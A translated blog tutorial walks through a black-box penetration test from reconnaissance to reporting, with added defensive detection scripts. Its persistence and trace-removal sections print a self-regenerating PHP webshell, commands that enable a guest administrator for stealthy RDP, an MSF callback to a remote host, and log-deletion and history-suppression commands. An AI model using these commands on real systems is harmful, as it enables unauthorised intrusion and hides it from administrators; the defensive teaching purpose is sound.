A complete penetration testing process - translation

Penetration testing

Penetration testing means using our knowledge of attack techniques to penetrate a website step by step, discover the vulnerabilities and hidden risks in it, and then write a test report for the customer. Using that report, the customer fixes the website's vulnerabilities so that attackers cannot break in.

The precondition of a penetration test is that the client has authorized us to test the website. Performing a penetration test on a website without the client's authorization is against the law. On June 1 last year China promulgated the "Network Security Law", which places legal constraints on cybercrime; if you are not familiar with it, see: Network Security Law.

Penetration testing is divided into white box testing and black box testing:

1. White box testing attacks the target website with knowledge of its source code and other internal information; it is similar to code auditing.

2. Black box testing gives us only the website's URL and nothing else, and then lets us attack it, simulating an outside attacker's penetration of the website.

Here we play the role of an attacker conducting a penetration test on a website. This is a black box test: we know only the website's URL and nothing else.

Next I will share the process and ideas of black box penetration testing.

Once we have identified a target, what should we do first?

Information gathering

The first step is information gathering. As the saying goes, know yourself and know your enemy, and you will win every battle. Starting from the website's URL we can find out a series of facts about it: the website's IP address, the server's operating system, the scripting language, whether other websites are hosted on the same server, and so on.

Vulnerability detection

When we have collected enough information, we start checking the website for vulnerabilities, that is, whether common web vulnerabilities such as the following are present:

SQL injection
XSS cross-site scripting
CSRF cross-site request forgery
XXE XML external entity injection
SSRF server-side request forgery
file inclusion
file upload
file parsing
remote code execution
CORS cross-origin resource sharing misconfiguration
unauthorized access
directory listing and arbitrary file read/download

These are some of the vulnerabilities commonly found in websites; there are others that I will not list here.

There are also many website vulnerability scanners, such as:

AWVS
AppScan
OWASP ZAP
Nessus

These are the most commonly used website vulnerability scanners; there are many more that I will not list here.

Exploitation

When we detect a vulnerability in the website, we exploit it. Different vulnerabilities have different exploitation tools. In many cases a single vulnerability is not enough to obtain a webshell on the website; we often need to chain several vulnerabilities to get one. Commonly used exploitation tools are as follows:

SQL injection tools

XSS cross-site scripting tools

Packet capture tools

File upload: if there is a file upload vulnerability, we usually upload a one-line webshell (a "one sentence Trojan") and thereby obtain the webshell

However, the webshell usually runs with very low privileges, so we need to escalate privileges. We can choose to get a reverse shell of the MSF type and escalate from there (Metasploit Framework (MSF); msfvenom generates the backdoor payload), or get a reverse shell of the Cobalt Strike type (Cobalt Strike). MSF and Cobalt Strike can also be used together (MSF and Cobalt Strike linkage). Other privilege escalation techniques can also be used: Windows, Linux.

Intranet forwarding

After we get the website's webshell, if we want information about the host we can replace the webshell with an MSF shell: generate a Trojan (payload) directly, run it through the webshell client (China Chopper, "caidao"), and we receive an MSF shell.

If we want to probe the intranet hosts further, we need intranet forwarding. We cannot communicate directly with hosts on the intranet, so we use the compromised website server, on which we have the webshell, to relay traffic to the intranet hosts.

Intranet lateral penetration

When we have obtained control of the external-facing server and entered the system, we must try our best to find the information we want on that server.

On Windows hosts, look through the directories carefully; there may be many unexpected finds. Many people store account passwords and other easy-to-forget items in notes or on the desktop. We can also find the database connection file and read sensitive information such as the database account and password from it.

Once we have obtained the account password of the Windows host, or created a new user ourselves, we try not to use Remote Desktop, so that the website administrator does not notice us and the server is not disrupted. Remote Desktop use is very visible: if the server administrator is logged in at the same time and you log in via Remote Desktop, the administrator is pushed out of the session and will soon kick you out. If Remote Desktop login is really required, try not to create a new user for it; instead activate the guest user, add it to the Administrators group, and log in as guest. After logging in over RDP, check what software is on other users' desktops and in other directories. The things we look for are as follows:

FTP-related software
Database-related software
Browser history, and whether any websites have saved user passwords; use tools to dump the passwords saved by the browser
From the account passwords found on the host we can build a dictionary; when brute-forcing other machines on the intranet, the same passwords are likely to be reused.

The commands for the guest-account approach above (cmd.exe; the :: lines are annotations, not part of the commands):

    :: activate the guest user
    net user guest /active:yes
    :: add guest to the local Administrators group
    net localgroup administrators guest /add
    :: change the guest user's password
    net user guest password
    :: allow Remote Desktop connections (port 3389)
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
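From the defender's side, the sequence above (guest enabled, added to Administrators, password reset, RDP switched on in the registry, guest RDP logon) leaves a recognizable trail in the Windows Security log. The detection rule below is an added example written for this page, not code from the original post. It runs over constructed event records shaped like the fields an EVTX parser exposes (EventID, TargetUserName, MemberName, LogonType, ObjectValueName), and it also flags the creation of a `$`-suffixed local user, the hidden-user trick mentioned under Windows persistence later in the post. The host name, user names and IP addresses in the sample are made up.

```python
"""
Added example (not from the original post): a detection rule for the guest-account /
RDP enablement sequence, evaluated over Windows Security event records.
The event IDs and field names below are Microsoft's documented ones; the sample
events themselves are constructed.
"""
from collections import defaultdict

# Windows Security event IDs used by the rule.
USER_ENABLED = 4722              # A user account was enabled
PASSWORD_RESET = 4724            # An attempt was made to reset an account's password
LOCAL_GROUP_MEMBER_ADDED = 4732  # A member was added to a security-enabled local group
USER_CREATED = 4720              # A user account was created
REGISTRY_VALUE_MODIFIED = 4657   # A registry value was modified (requires object-access auditing on the key)
LOGON = 4624                     # An account was successfully logged on
REMOTE_INTERACTIVE = 10          # 4624 LogonType for Remote Desktop sessions

# Constructed sample events (not real telemetry). In 4732, TargetUserName is the group
# and MemberName is the account that was added.
SAMPLE_EVENTS = [
    {"EventID": 4722, "TargetUserName": "Guest", "SubjectUserName": "webadmin", "Computer": "WEB01"},
    {"EventID": 4732, "TargetUserName": "Administrators", "MemberName": "WEB01\\Guest",
     "SubjectUserName": "webadmin", "Computer": "WEB01"},
    {"EventID": 4724, "TargetUserName": "Guest", "SubjectUserName": "webadmin", "Computer": "WEB01"},
    {"EventID": 4657, "ObjectValueName": "fDenyTSConnections", "OldValue": "1", "NewValue": "0",
     "SubjectUserName": "webadmin", "Computer": "WEB01"},
    {"EventID": 4624, "TargetUserName": "Guest", "LogonType": 10, "IpAddress": "10.20.30.40", "Computer": "WEB01"},
    {"EventID": 4720, "TargetUserName": "support$", "SubjectUserName": "webadmin", "Computer": "WEB01"},
    {"EventID": 4624, "TargetUserName": "alice", "LogonType": 10, "IpAddress": "10.20.30.5", "Computer": "WEB01"},  # benign
]


def _is_guest(name):
    """Match 'Guest' with or without a DOMAIN\\ or HOST\\ prefix."""
    return name.split("\\")[-1].lower() == "guest"


def detect(events):
    """Return a list of (rule, detail) alerts; each rule corresponds to one step of the sequence."""
    alerts = []
    guest_steps = defaultdict(set)  # host -> steps of the guest chain observed there
    for ev in events:
        eid = ev.get("EventID")
        host = ev.get("Computer", "?")
        target = ev.get("TargetUserName", "")
        actor = ev.get("SubjectUserName", "?")
        if eid == USER_ENABLED and _is_guest(target):
            alerts.append(("guest_enabled", f"{host}: Guest enabled by {actor}"))
            guest_steps[host].add("enabled")
        elif eid == LOCAL_GROUP_MEMBER_ADDED and target.lower() == "administrators":
            member = ev.get("MemberName", "")
            alerts.append(("admin_group_member_added", f"{host}: {member} added to Administrators by {actor}"))
            if _is_guest(member):
                guest_steps[host].add("admin")
        elif eid == PASSWORD_RESET and _is_guest(target):
            alerts.append(("guest_password_reset", f"{host}: Guest password reset by {actor}"))
            guest_steps[host].add("password")
        elif (eid == REGISTRY_VALUE_MODIFIED
              and ev.get("ObjectValueName") == "fDenyTSConnections"
              and ev.get("NewValue") == "0"):
            alerts.append(("rdp_enabled_via_registry", f"{host}: fDenyTSConnections set to 0 by {actor}"))
            guest_steps[host].add("rdp")
        elif eid == LOGON and ev.get("LogonType") == REMOTE_INTERACTIVE and _is_guest(target):
            alerts.append(("guest_rdp_logon", f"{host}: Guest RDP logon from {ev.get('IpAddress')}"))
            guest_steps[host].add("logon")
        elif eid == USER_CREATED and target.endswith("$"):
            # A local user whose name ends in '$' does not appear in `net user` output;
            # only computer accounts legitimately look like this.
            alerts.append(("hidden_user_created", f"{host}: user {target!r} created by {actor}"))
    # Correlation: guest enabled *and* made an administrator on the same host is high confidence.
    for host, steps in guest_steps.items():
        if {"enabled", "admin"} <= steps:
            alerts.append(("guest_admin_rdp_chain", f"{host}: steps observed {sorted(steps)}"))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
```

The individual rules are noisy on their own (administrators do reset passwords and add group members), so the correlated `guest_admin_rdp_chain` alert is the one worth paging on; the 4657 rule only fires if a SACL is set on the Terminal Server key, so on hosts without object-access auditing rely on the account events plus a configuration baseline check of fDenyTSConnections.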

On Linux hosts we can look at the open ports, the running services, and the intranet hosts that have connected to the machine. Search the directories for the website's database connection password. In short, collect as many account passwords as possible; they are very useful for account brute-forcing on the intranet.

After building a tunnel into the intranet, we first need to discover the assets on it. Determining which network segments are live is a big problem: it is quite possible that 10.0.0.0/8, 172.16.0.0/16 and 192.168.0.0/24 segments all exist in the intranet at the same time, so we have to probe with a scanner. Scanning the intranet through a proxy with nmap is not recommended. If you scan through a proxy from your own host and can use a graphical tool, you can use RouterScan, the Yujian high-speed TCP full-port scanner, or IIS_Scanner; be sure to lower the thread count, otherwise the proxy will easily collapse. If you prefer a command-line scanner, you can use the S scanner. After scanning the intranet assets and open ports: for port 445 you can try MS17-010, but note that reaching 445 through a proxy works differently from the earlier steps; for port 3389, CVE-2019-0708 can be tried; for ports such as 1433/3306/6379 you can try brute-forcing, and using the account passwords collected earlier gives a much higher success rate.
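Seen from the network side, the sweep described above is a pivot host suddenly opening connections to many internal addresses on 445/3389/1433/3306/6379, usually denied by segmentation rules and therefore visible in firewall or flow logs. The Python below is an added example, not part of the original post: the "timestamp src dst dport action" log format and the sample lines are constructed, and the window and host-count thresholds are assumptions to tune per environment.

```python
"""
Added example (not from the original post): flag internal sources that touch many
distinct hosts on lateral-movement ports within a short window, from flow log lines.
Log format, sample data and thresholds are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

LATERAL_PORTS = {445, 3389, 1433, 3306, 6379}  # the ports the text singles out
WINDOW = timedelta(minutes=5)                   # assumption: sliding window length
MIN_DISTINCT_HOSTS = 10                         # assumption: a pivot sweeping a /24 exceeds this quickly


def parse_line(line):
    """Parse 'ISO-timestamp src dst dport action' (constructed format) into typed fields."""
    ts, src, dst, dport, action = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), action


def detect_sweeps(lines):
    """Return {src: (window_start, distinct_hosts, sorted_ports)} for sources that look like a sweep.

    Denied and allowed connections both count: a sweep is about fan-out, not success.
    """
    per_src = defaultdict(list)  # src -> [(ts, dst, dport)]
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, dport, _action = parse_line(line)
        if dport in LATERAL_PORTS:
            per_src[src].append((ts, dst, dport))

    sweeps = {}
    for src, events in per_src.items():
        events.sort()
        best = None
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it fits inside WINDOW
            while events[end][0] - events[start][0] > WINDOW:
                start += 1
            window = events[start:end + 1]
            hosts = {e[1] for e in window}
            if len(hosts) >= MIN_DISTINCT_HOSTS and (best is None or len(hosts) > best[1]):
                best = (window[0][0], len(hosts), sorted({e[2] for e in window}))
        if best is not None:
            sweeps[src] = best
    return sweeps


def build_sample_log():
    """Constructed sample: 10.10.5.23 (a web server) probes 445 and 3389 on 20 workstations in
    about a minute; 10.10.5.9 makes a handful of ordinary database connections."""
    base = datetime(2023, 8, 24, 2, 15, 0)
    lines = []
    for i in range(20):
        t = base + timedelta(seconds=3 * i)
        lines.append(f"{t.isoformat()} 10.10.5.23 192.168.0.{10 + i} 445 DENY")
        lines.append(f"{(t + timedelta(seconds=1)).isoformat()} 10.10.5.23 192.168.0.{10 + i} 3389 DENY")
    lines += [
        f"{(base + timedelta(minutes=1)).isoformat()} 10.10.5.9 10.10.6.2 3306 ALLOW",
        f"{(base + timedelta(minutes=2)).isoformat()} 10.10.5.9 10.10.6.2 3306 ALLOW",
        f"{(base + timedelta(minutes=3)).isoformat()} 10.10.5.9 10.10.6.3 6379 ALLOW",
    ]
    return lines


SAMPLE_LOG = build_sample_log()


def demo():
    return detect_sweeps(SAMPLE_LOG)


if __name__ == "__main__":
    for src, (when, n_hosts, ports) in demo().items():
        print(f"{src}: {n_hosts} distinct hosts on ports {ports} starting {when}")
```

The same fan-out logic works on proxy or SOCKS server logs when the attacker tunnels through a compromised web server, which is exactly the case the text describes; there the source to key on is the pivot box, and a web server contacting workstations on 445 at all is the anomaly, regardless of count.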

Persistence (maintaining access)

After obtaining access to the target host, it is quite likely that we cannot get what we want right away and need to stay hidden for a long time; in intranet penetration in particular, long-term information collection is required. At this point persistence is very important: we need to keep the access we already have.

Web backdoor

1: Hide the backdoor file (set the file's hidden attribute)

2: The "immortal shell" (undead horse): the script recreates test.php on the server every 5 seconds and writes into it a one-line webshell that evades detection. Combined with the attrib command to hide the file, this makes a sturdier backdoor.

    <?php
    set_time_limit(0);       // no execution time limit
    ignore_user_abort(1);    // keep running after the client disconnects
    unlink(__FILE__);        // delete this script itself; only the running loop remains
    while (1) {
        // rewrite the one-line webshell every 5 seconds; the code to eval is hidden in an array key
        file_put_contents('test.php', '<?php $a=array($_REQUEST["x"]=>"3");$b=array_keys($a)[0];eval($b);?>');
        sleep(5);
    }
    ?>

3: Hide the backdoor in the 404 page, or insert the backdoor code into other files that ship with the application

Note: all of the backdoor methods above can be detected by tools such as D-Shield
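Since the note says these backdoors are what D-Shield-type tools detect, here is what such a static check looks like in practice. The Python scanner below is an added example, not the post's or D-Shield's code; it recognizes the three patterns from this section (eval on request input, the array_keys() trick, and the self-regenerating loop) and runs against constructed sample files written to a temporary directory. The indicator regexes and verdict names are my own.

```python
"""
Added example (not from the original post): a static scanner for the PHP webshell
patterns discussed above. Indicators, verdict names and sample files are constructed.
"""
import re
import tempfile
from pathlib import Path

# Raw indicators; each regex is searched over the whole file.
INDICATORS = {
    "eval_call": re.compile(r"\beval\s*\("),
    "request_superglobal": re.compile(r"\$_(?:REQUEST|POST|GET|COOKIE)\b"),
    "array_keys_index_trick": re.compile(r"array_keys\s*\(\s*\$\w+\s*\)\s*\[\s*0\s*\]"),
    "self_delete": re.compile(r"unlink\s*\(\s*__FILE__\s*\)"),
    "detach_from_client": re.compile(r"\bignore_user_abort\s*\("),
    "infinite_loop": re.compile(r"\bwhile\s*\(\s*(?:1|true)\s*\)"),
    "writes_php_file": re.compile(r"file_put_contents\s*\(\s*['\"][^'\"]*\.php['\"]"),
}


def classify(src):
    """Combine raw indicators into the three verdicts this section describes."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(src)}
    verdicts = []
    if {"eval_call", "request_superglobal"} <= hits:
        verdicts.append("eval-of-request-input webshell")
    if {"eval_call", "array_keys_index_trick"} <= hits:
        verdicts.append("array_keys() eval obfuscation")
    if {"detach_from_client", "infinite_loop", "writes_php_file"} <= hits:
        verdicts.append("self-regenerating (immortal) dropper")
    return {"indicators": sorted(hits), "verdicts": verdicts}


def scan_tree(root):
    """Return {relative posix path: verdicts} for every .php file under root that gets a verdict.
    A hidden attribute or a leading dot does not keep a file out of a directory walk."""
    findings = {}
    for path in sorted(root.rglob("*.php")):
        try:
            src = path.read_text(errors="replace")
        except OSError:
            continue
        verdicts = classify(src)["verdicts"]
        if verdicts:
            findings[path.relative_to(root).as_posix()] = verdicts
    return findings


# Constructed samples: the regenerating script from the text, the one-liner it writes,
# and ordinary application code that also reads a request parameter.
IMMORTAL_DROPPER = """<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
  file_put_contents('test.php', '<?php $a=array($_REQUEST["x"]=>"3");$b=array_keys($a)[0];eval($b);?>');
  sleep(5);
}
?>"""
DROPPED_SHELL = '<?php $a=array($_REQUEST["x"]=>"3");$b=array_keys($a)[0];eval($b);?>'
BENIGN = '<?php\n$q = $_GET["q"] ?? "";\necho htmlspecialchars($q);\n'


def demo():
    """Write the samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "uploads").mkdir()
        (root / "uploads" / "dropper.php").write_text(IMMORTAL_DROPPER)
        (root / "test.php").write_text(DROPPED_SHELL)
        (root / "search.php").write_text(BENIGN)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, verdicts in demo().items():
        print(f"{rel}: {', '.join(verdicts)}")
```

Two remediation points follow from the pattern itself: the dropper unlinks its own file, so on a live host the only trace of it is a PHP worker process stuck in the loop, and deleting test.php alone is undone within 5 seconds; stop the PHP workers (restart php-fpm or the web server) before removing the file. File-integrity monitoring on the web root catches the rewrite cadence even when the one-liner itself is obfuscated past a regex.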

Windows system

1: Create a hidden user by appending $ to the user name

2: Place the Trojan file in the startup directory; whenever the target machine restarts, it connects back to our remote control (C2)

3: The persistence module in MSF: running it makes the target machine connect back to the remote control at regular intervals, but it is easy to spot

    # connects back every 5 seconds to the handler at 192.168.10.27 on the port given with -p;
    # the drawback is that it is easily flagged by anti-virus software
    run persistence -X -i 5 -p 8888 -r 192.168.10.27
    # this created C:\Windows\TEMP\CJzhFlNOWa.vbs on the target and registered it in the registry, so it runs at every boot

4: In a domain environment, find a way to obtain the hash of the krbtgt account, which can be used for pass-the-ticket attacks; the krbtgt password is generally not changed often

5: Shift (sticky keys) backdoor

6: Remote Desktop session hijacking

Linux system

1: SSH backdoor

2: crontab scheduled task

3: SSH public key

4: Create a user with UID 0

Trace removal

Sometimes the goal is just to break into the website and put up a defaced page to show off; or to leave a backdoor so the site can be used as a zombie ("broiler") to come back to when idle; or to plant a mining Trojan. But please do not do these things; they are illegal!

Here I only teach how to remove some of the traces left after an intrusion; they cannot be removed completely. It is impossible to erase intrusion traces entirely! The main purpose is to raise the time and labour cost for the administrator to discover the intruder. As long as the administrator wants to investigate, no matter how you clean up, traces can still be found.

The most important thing is to hide your identity. The best approach is to set up a proxy before the intrusion and remove traces afterwards.

Windows system

1: On Windows you can use MSF's clearev command to clear the event logs

2: If you logged in remotely over 3389, you need to clear the traces left by mstsc

3: Run the following command to delete log files:

    del %WINDIR%\*.log /a/s/q/f

4: For a web application, find the web server log files and delete them

Linux system

1: On Linux, after obtaining access, run the following commands so that the commands you type are not recorded in the shell history:

    export HISTFILE=/dev/null
    export HISTSIZE=0

2: Delete the log files in the /var/log directory

3: For a web application, find the web server log files and delete them
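For the defender, the Linux steps above share one weakness: they only change what is stored on the compromised host. The Python check below is an added example, not from the original post; it looks for processes whose initial environment carries HISTFILE=/dev/null or HISTSIZE=0 and for expected /var/log files that are missing or truncated to zero bytes. The /proc tree, log directory and expected log names are parameters (the demo builds a constructed fake tree under a temporary directory), and the list of expected log names is an assumption for a Debian-style host.

```python
"""
Added example (not from the original post): checks for the two Linux trace-removal
techniques in the text. Paths and sample data are constructed; on a real host call
find_history_suppression(Path('/proc')) and find_missing_or_emptied_logs(Path('/var/log')).
"""
import tempfile
from pathlib import Path

# Assumption: log files expected on a Debian-style host; adjust per distribution.
EXPECTED_LOGS = ["auth.log", "syslog", "wtmp", "btmp", "lastlog"]


def read_environ(proc_dir):
    """Parse /proc/<pid>/environ (NUL-separated KEY=VALUE pairs) into a dict."""
    env = {}
    for item in (proc_dir / "environ").read_bytes().split(b"\0"):
        if b"=" in item:
            key, value = item.split(b"=", 1)
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def find_history_suppression(proc_root):
    """Return [(pid, comm, reason)] for processes whose environment disables shell history.

    /proc/<pid>/environ holds the environment a process was *started* with, so the shell
    in which `export HISTFILE=/dev/null` was typed does not show it; every program that
    shell launched afterwards (sub-shells, scanners, editors) inherited it and does.
    """
    findings = []
    for proc_dir in sorted(proc_root.iterdir(), key=lambda p: p.name):
        if not proc_dir.name.isdigit():
            continue  # /proc/self, /proc/sys, ...
        try:
            comm = (proc_dir / "comm").read_text().strip()
            env = read_environ(proc_dir)
        except OSError:
            continue  # process exited, or not readable without root
        reasons = []
        if env.get("HISTFILE") == "/dev/null":
            reasons.append("HISTFILE=/dev/null")
        if env.get("HISTSIZE") == "0" or env.get("HISTFILESIZE") == "0":
            reasons.append("HISTSIZE/HISTFILESIZE=0")
        if reasons:
            findings.append((int(proc_dir.name), comm, ", ".join(reasons)))
    return findings


def find_missing_or_emptied_logs(log_dir, expected=EXPECTED_LOGS):
    """Return {name: 'missing' | 'empty'} for expected logs that are gone or zero bytes."""
    status = {}
    for name in expected:
        path = log_dir / name
        if not path.exists():
            status[name] = "missing"
        elif path.stat().st_size == 0:
            status[name] = "empty"
    return status


def demo():
    """Build a constructed /proc-like tree and log directory, then run both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        proc = Path(tmp) / "proc"
        logs = Path(tmp) / "log"
        logs.mkdir()
        fake_procs = {
            "1234": ("bash", b"HOME=/root\0HISTFILE=/dev/null\0HISTSIZE=0\0"),  # sub-shell started after the export
            "1300": ("sshd", b"PATH=/usr/sbin:/usr/bin\0"),                     # ordinary daemon
            "1350": ("python3", b"HISTFILE=/dev/null\0PATH=/usr/bin\0"),        # tool launched from that shell
        }
        for pid, (comm, environ) in fake_procs.items():
            (proc / pid).mkdir(parents=True)
            (proc / pid / "comm").write_text(comm + "\n")
            (proc / pid / "environ").write_bytes(environ)
        (proc / "self").mkdir()  # non-numeric entry, as in a real /proc; must be skipped
        (logs / "auth.log").write_bytes(b"")  # truncated to zero bytes
        (logs / "syslog").write_text("Aug 24 02:11:05 web01 cron[1]: constructed sample line\n")
        (logs / "btmp").write_bytes(b"\x01")
        (logs / "lastlog").write_bytes(b"\x01")
        # wtmp deliberately absent: deleted
        return find_history_suppression(proc), find_missing_or_emptied_logs(logs)


if __name__ == "__main__":
    history, logs = demo()
    for pid, comm, reason in history:
        print(f"pid {pid} ({comm}): {reason}")
    print(logs)
```

Neither finding is proof on its own (a zero-byte log can follow a fresh rotation), which is why the durable control is to not depend on host-local evidence at all: forward syslog and auth events to a remote collector as they are written, and record command execution with auditd execve rules rather than trusting .bash_history, which the attacker controls.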

Writing a penetration test report

After completing the penetration test, we need to write a penetration test report for it, clearly stating where the vulnerabilities are and how to fix them, so that the website administrators can patch these vulnerabilities and risks according to our report and keep the site from being attacked.

Everything we do is meant to create a safer and more trustworthy network environment. Please remember not to use this article to commit illegal or criminal acts!

Origin blog.csdn.net/Arvin_FH/article/details/132453386